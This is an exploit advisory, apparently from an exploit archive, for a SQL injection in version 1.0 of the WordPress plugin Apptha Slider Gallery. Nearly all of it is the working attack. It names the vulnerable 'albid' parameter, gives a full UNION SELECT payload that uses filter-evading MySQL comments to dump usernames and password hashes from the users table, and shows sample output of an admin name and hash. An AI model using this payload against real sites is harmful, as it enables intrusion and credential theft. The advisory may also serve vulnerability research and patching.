# # # # # # Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - SQL Injection # Google Dork: N/A # Date: 09.03.2017 # Vendor Homepage: https://www.apptha.com/ # Software: https://www.apptha.com/category/extension/Wordpress/apptha-slider-gallery # Demo: http://www.apptha.com/demo/apptha-slider-gallery # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/?albid=[SQL] # For example; # -3+/*!50000union*/+select+1,2,3,4,5,0x496873616e2053656e63616e20207777772e696873616e2e6e6574,concat(user_login,0x3a,user_pass),8,9,10,11,12,13,14+from+pleasant_users--+-&pid=6 # admin:$P$BKL0XND.tfopqZH6S.QU.vhgjuVchx1 # Etc.. # # # # #